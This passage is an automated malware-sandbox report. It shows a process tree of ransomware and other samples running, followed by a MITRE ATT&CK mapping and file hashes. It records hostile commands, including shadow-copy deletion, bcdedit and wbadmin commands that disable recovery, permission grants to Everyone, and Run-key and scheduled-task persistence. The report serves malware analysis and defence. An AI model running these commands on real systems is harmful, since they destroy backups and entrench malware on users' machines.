        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\84B1.tmp\spwak.vbs
        7⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\84B1.tmp\spwak.vbs
        8⤵
        
        PID:3716
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:5076
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall reset
      4⤵
      Modifies Windows Firewall
      PID:4860
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___OH40JKQL_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:5908
  - - C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___O1QCI_.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:5160
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
      4⤵
      PID:5420
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
        5⤵
        
        PID:3928
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im E
        6⤵
        Kills process with taskkill
        
        PID:2316
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:5212
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    PID:4548
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      Views/modifies file attributes
      PID:2404
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:3328
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:5112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 220411712738533.bat
      4⤵
      PID:2468
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe //nologo m.vbs
        5⤵
        
        PID:4228
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s F:\$RECYCLE
      4⤵
      Views/modifies file attributes
      PID:2592
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected] co
      4⤵
      PID:5632
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @[email protected] vs
      4⤵
      PID:4028
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
        
        @[email protected] vs
        5⤵
        
        PID:5800
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        6⤵
        
        PID:648
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:4396
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        
        PID:5800
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "svgirwyi764" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
      4⤵
      PID:5740
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "svgirwyi764" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
        5⤵
        Modifies registry key
        
        PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5748
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7116
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6872
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6648
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6808
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5972
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:316
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6456
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3584
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3128
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5248
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7216
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7484
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:8064
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6448
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6704
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7864
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1404
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2684
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:8068
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3788
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7196
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6348
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6588
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7460
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8140
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5656
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6588
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1536
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3324
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5716
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6828
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7088
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6336
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4276
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:8280
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:8304
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6480
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:11116
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:11124
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:11584
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:15056
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:15064
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:14732
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:17316
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:19592
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:19948
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
    "RIP_YOUR_PC_LOL.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Users\Admin\Desktop\1.exe
      "C:\Users\Admin\Desktop\1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4364
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\68AD.tmp\68AE.tmp\68AF.bat C:\Users\Admin\Desktop\1.exe"
        5⤵
        
        PID:516
  - - C:\Users\Admin\Desktop\10.exe
      "C:\Users\Admin\Desktop\10.exe"
      4⤵
      PID:4084
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h .
        5⤵
        Views/modifies file attributes
        
        PID:5344
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls . /grant Everyone:F /T /C /Q
        5⤵
        Modifies file permissions
        
        PID:5428
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
      4⤵
      PID:792
  - - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
      4⤵
      PID:5132
  - - C:\Users\Admin\Desktop\5.exe
      "C:\Users\Admin\Desktop\5.exe"
      4⤵
      PID:4660
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
        5⤵
        
        PID:888
      - C:\PROGRA~3\system.exe
        
        C:\PROGRA~3\system.exe
        6⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:2396
  - - C:\Users\Admin\Desktop\6.exe
      "C:\Users\Admin\Desktop\6.exe"
      4⤵
      PID:5844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lDMMDpoa8E.bat"
        5⤵
        
        PID:5936
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:5544
      - C:\Windows\System32\SmallRoom\taskhostw.exe
        
        "C:\Windows\System32\SmallRoom\taskhostw.exe"
        6⤵
        
        PID:1836
  - - C:\Users\Admin\Desktop\7.exe
      "C:\Users\Admin\Desktop\7.exe"
      4⤵
      PID:2144
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        
        PID:5432
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        
        PID:5500
  - - C:\Users\Admin\Desktop\8.exe
      "C:\Users\Admin\Desktop\8.exe"
      4⤵
      PID:4236
    - - C:\Windows\system32\wbem\wmic.exe
        
        "C:\sums\..\Windows\mhw\..\system32\upqrk\jej\adxc\..\..\..\wbem\ahmd\wkt\..\..\wmic.exe" shadowcopy delete
        5⤵
        
        PID:2596
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
      4⤵
      PID:652
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
    "ska2pwej.aeh.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\is-FE6R1.tmp\ska2pwej.aeh.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-FE6R1.tmp\ska2pwej.aeh.tmp" /SL5="$30252,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
      4⤵
      Executes dropped EXE
      PID:488
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
    "x2s443bc.cs1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:760
  - - C:\Users\Admin\AppData\Local\Temp\is-8ULN5.tmp\x2s443bc.cs1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8ULN5.tmp\x2s443bc.cs1.tmp" /SL5="$3025E,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
      4⤵
      Executes dropped EXE
      PID:3728

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:764

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2296

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f0
1⤵
PID:3428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\5.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Documents and Settings\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5772

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\System32\SmallRoom\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "VLTKNH~1" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images\VLTKNH~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5372

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5592

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5884

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5668

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5512

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:6780
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6928
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:7012

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4424

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6332

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\2553614d1b014e7fbf44d2f2e2593cf3 /t 5268 /p 6624
1⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:7580

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5404

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\953f07d11f534240ae430e39f6e6d6a1 /t 0 /p 5404
1⤵
PID:7252

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
PID:4328

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ghjkg" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Adobe\Setup\ghjk.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ghjk" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Setup\ghjk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ghjkg" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Adobe\Setup\ghjk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "APPGAT~1A" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\APPGAT~1.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "APPGAT~1" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\APPGAT~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "APPGAT~1A" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\APPGAT~1.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\uk-UA\WerFault.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\uk-UA\WerFault.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFaultW" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Defender\uk-UA\WerFault.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Windows\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Windows\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Windows\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:10520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\@[email protected]

Filesize
316KB

MD5
ef36a5e9dfd6538dc48d62e97f194f2c

SHA1
624fc93c85d15438c8e07dac529ff8da6d59fe43

SHA256
49138428bacfb85ede4c1ff703179bef384da7253feb2930870cd47eecaaf382

SHA512
421089497e5763517d697bda00029ef7c8ef43ec167f9b3d211fa11f311b2197ea6c77287801786a484967e40051f9f8633361eb4a1ced3a882502fa35b9faba

Download Submit
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE

Filesize
328KB

MD5
39c8a4c2c3984b64b701b85cb724533b

SHA1
c911f4c4070dfe9a35d9adcb7de6e6fb1482ce00

SHA256
888a1dd0033e5d758a4e731e3e55357de866e80d03b1b194375f714e1fd4351d

SHA512
f42ca2962fe60cff1a13dea8b81ff0647b317c785ee4f5159c38487c34d33aecba8478757047d31ab2ee893fbdcb91a21655353456ba6a018fc71b2278db4db2

Download Submit
C:\PROGRA~3\Windows\csrss.exe

Filesize
1.4MB

MD5
a10969e3072f362cb78f2ada214d4d71

SHA1
bda19b72d456aa045b3077d5d058880cb94b1b22

SHA256
4f547f3ac998acce23447ca171cd7285f04f474dc7fd0a0b2d5c947822df8cd7

SHA512
